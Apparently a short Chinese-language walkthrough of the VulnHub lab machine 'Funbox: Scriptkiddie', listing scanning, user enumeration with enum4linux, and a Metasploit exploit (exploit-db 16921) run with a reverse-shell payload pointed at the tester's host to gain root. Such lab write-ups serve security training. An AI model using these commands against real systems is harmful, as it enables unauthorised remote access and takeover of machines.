英文名称：Funbox: Scriptkiddie中文名称：FUNBOX：脚本小子发布日期：2021 年 7 月 20 日难度：容易描述：与往常一样，它对初学者来说是一个非常简单的盒子。添加到您的 /etc/hosts: funbox11下载地址：https://www.vulnhub.com/entry/funbox-scriptkiddie,725/

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

1、主机发现

主机发现

2、端口扫描

端口扫描

banner 扫描

3、配置hosts并访问页面192.168.199.207 funbox11

访问页面

4、枚举用户名（bill）enum4linux -a 192.168.199.207

枚举用户名

5、目录发现

目录发现

访问页面

6、漏洞扫描，存在后门

漏洞扫描

7、将rb文件放在msf 框架中，启动msf consolemv /usr/share/exploitdb/exploits/linux/remote/16921.rb /usr/share/metasploit-framework/modules/exploits/mytestreload_alluse exploit/mytest/16921

启动msf

8、漏洞利用，直接获得root权限set payload payload/cmd/unix/reverseset LHOST 192.168.199.247set RHOSTS 192.168.199.207run

漏洞利用

获得root的flag

到此，实验完成～